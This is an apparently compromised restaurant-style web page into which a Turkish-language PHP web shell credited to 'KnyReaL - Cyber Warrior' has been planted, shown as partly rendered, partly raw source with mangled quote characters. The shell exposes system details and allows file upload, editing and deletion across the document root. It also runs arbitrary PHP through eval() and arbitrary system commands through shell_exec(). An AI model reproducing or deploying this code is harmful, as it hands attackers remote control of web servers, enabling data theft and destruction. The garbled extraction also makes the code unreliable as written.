<
  • Pub 0
  • Pub 1
  • Pub 2

Fantastic Food and Fun

     

greener_daze__viscus_cycle_800

 

KnyReaL - Cyber Warrior

Cyber Warrior
KnyReaL tarafından "Lojistik Destek" için hazırlanmıştır.
Sistem Bilgileri
[!COUTE-!].date("d-m-Y - H:i").[!COUTE-!][!COUTE-!]; ?>
Güvenli Mod :
Açık[!COUTE-!]; }else{ echo [!COUTE-!]Kapalı[!COUTE-!]; }?>
Senin Ip : Server Ip : Server Port :
Uname -a :
Sürümler :
Curl : Açık[!COUTE-!]; }else{ echo "Kapalı"; } ?> MySql : Açık[!COUTE-!]; }else{ echo "Kapalı"; } ?>

Dizin işlemleri : Dizine Dosya Yükle :
?knyreal=KnyReaLDosyaYukle&dizinyolu=" method="post" enctype="multipart/form-data">
[!COUTE-!];}else{echo [!COUTE-!][!COUTE-!];}echo [!COUTE-!][!COUTE-!];echo [!COUTE-!][!COUTE-!];echo [!COUTE-!][!COUTE-!];}else{if(DzIslm($DizinAdi)){echo [!COUTE-!][!COUTE-!];}else{echo [!COUTE-!][!COUTE-!];}echo [!COUTE-!][!COUTE-!];echo [!COUTE-!][!COUTE-!];echo [!COUTE-!][!COUTE-!];}}closedir($DizinLs);}}?>
Dizin izinler Boyut Işlem
[!COUTE-!].$DizinAdi.[!COUTE-!]
[!COUTE-!].$DizinAdi.[!COUTE-!]
[!COUTE-!].KnyRealizinGoster($_SERVER["DOCUMENT_ROOT"].[!COUTE-!]/[!COUTE-!].$_GET[[!COUTE-!]KnyReaLDizinAdi[!COUTE-!]].[!COUTE-!]/[!COUTE-!].$DizinAdi).[!COUTE-!] [!COUTE-!][email protected]($_SERVER["DOCUMENT_ROOT"].[!COUTE-!]/[!COUTE-!].$_GET[[!COUTE-!]KnyReaLDizinAdi[!COUTE-!]].[!COUTE-!]/[!COUTE-!].$DizinAdi).[!COUTE-!] Sil
[!COUTE-!].$DizinAdi.[!COUTE-!]
[!COUTE-!].$DizinAdi.[!COUTE-!]
[!COUTE-!].KnyRealizinGoster($_SERVER["DOCUMENT_ROOT"].[!COUTE-!]/[!COUTE-!].$DizinAdi).[!COUTE-!] [!COUTE-!][email protected]($_SERVER["DOCUMENT_ROOT"].[!COUTE-!]/[!COUTE-!].$DizinAdi).[!COUTE-!] Sil

?knyreal=KnyReaLCmdKullan" method="post">
KOMUT ÇALIŞTIR :

MySql Bağlantısı Kur
?knyreal=KnyReaLMysqlBaglan" method="post">
MySql Kodu Çalıştır :Veritabanı Adı :
V. Kullanıcı Adı :
V. Parolası :
Veritabanı Port :

?knyreal=KnyReaLPhpKoduCalistir" method="post">
PHP Kodu Çalıştır :Dosya Silindi
Geri";}else{if($SilTumuCek = glob($SilDizinAdi."/*")){foreach($SilTumuCek as $SilTumuCekLst){is_dir($SilTumuCekLst)? @rmdir($SilTumuCekLst) : unlink($SilTumuCekLst);}}@rmdir($SilDizinAdi);echo "

Silme işlemi başarılı.
Geri

";}}KnyReaLDizinSilFunc($_GET[[!COUTE-!]sildizin[!COUTE-!]]);break;case "KnyReaLDizinDuzenleLnk":if(empty($_GET[[!COUTE-!]sad[!COUTE-!]])){echo "

işlem gerçekleştirilemez.
Geri

";}else{if(! file_exists($_SERVER["DOCUMENT_ROOT"].[!COUTE-!]/[!COUTE-!].$_GET[[!COUTE-!]sad[!COUTE-!]])){echo "

işlem gerçekleştirilemez.
Geri

";}else{echo [!COUTE-!]

BURADASIN : [!COUTE-!].$_SERVER["DOCUMENT_ROOT"]."/".$_GET["sad"].[!COUTE-!]

[!COUTE-!];}}break;case "KnyReaLDizinDzKayitLnk":if($_GET[[!COUTE-!]duzenle[!COUTE-!]]){if(! file_exists($_GET[[!COUTE-!]duzenle[!COUTE-!]])){echo "

işlem gerçekleştirilemez.
Geri

";}else{$DsDuzenleKyt = fopen ($_GET[[!COUTE-!]duzenle[!COUTE-!]] , [!COUTE-!]w[!COUTE-!]);fwrite ( $DsDuzenleKyt , $_POST[[!COUTE-!]metinduzunle[!COUTE-!]] ) ;fclose ($DsDuzenleKyt);echo "

Düzenleme işlemi tamamlandı.
Geri

";}}else{echo "

işlem gerçekleştirilemez.
Geri

";}break;case "KnyReaLMysqlBaglan":if(empty($_POST[[!COUTE-!]VeritabaniAdi[!COUTE-!]]) OR empty($_POST[[!COUTE-!]kullaniciadi[!COUTE-!]]) OR empty($_POST[[!COUTE-!]parola[!COUTE-!]])){echo "

Mysql bağlantısı başarısız. Boş değerler var.
Geri

";}else{if(empty($_POST[[!COUTE-!]port[!COUTE-!]])){$veritabaniac = @mysql_connect([!COUTE-!]localhost[!COUTE-!],$_POST[[!COUTE-!]kullaniciadi[!COUTE-!]],$_POST[[!COUTE-!]parola[!COUTE-!]]);}else{$veritabaniac = @mysql_connect([!COUTE-!]localhost:[!COUTE-!].$_POST[[!COUTE-!]port[!COUTE-!]],$_POST[[!COUTE-!]kullaniciadi[!COUTE-!]],$_POST[[!COUTE-!]parola[!COUTE-!]]);}if($veritabaniac){if(@mysql_select_db($_POST[[!COUTE-!]VeritabaniAdi[!COUTE-!]],$veritabaniac)){$eval = @str_replace("

","",$eval);$eval = @str_replace("

ÇALIŞTIRILAN KODDAN DÖNEN SONUÇ - Geri

";@eval("$eval");echo "";}else{echo "

Veritabanı bulunamadı.
Geri

";}}else{echo "

Veritabanına bağlanamadı.
Geri

";}}break;case "KnyReaLPhpKoduCalistir":$eval = @str_replace("

","",$eval);$eval = @str_replace("

PHP ÇIKTISI - Geri

";@eval("$eval");echo "";break;case "KnyReaLCmdKullan":echo [!COUTE-!]

CMD EXECUTE - Geri

[!COUTE-!];echo "

";$KnyReaLCmdBaslat =shell_exec($_POST[[!COUTE-!]cmd[!COUTE-!]]);echo "
$KnyReaLCmdBaslat
";echo "

";break;case "KnyReaLDosyaYukle":if (move_uploaded_file($_FILES[[!COUTE-!]yukledosya[!COUTE-!]][[!COUTE-!]tmp_name[!COUTE-!]], $_GET[[!COUTE-!]dizinyolu[!COUTE-!]].[!COUTE-!]/[!COUTE-!].$_FILES[[!COUTE-!]yukledosya[!COUTE-!]][[!COUTE-!]name[!COUTE-!]])){echo "

Dosya yüklemesi başarılı.
Geri

";}else{echo "

Dosya Yükelenemdi.
Geri

";}break;}?>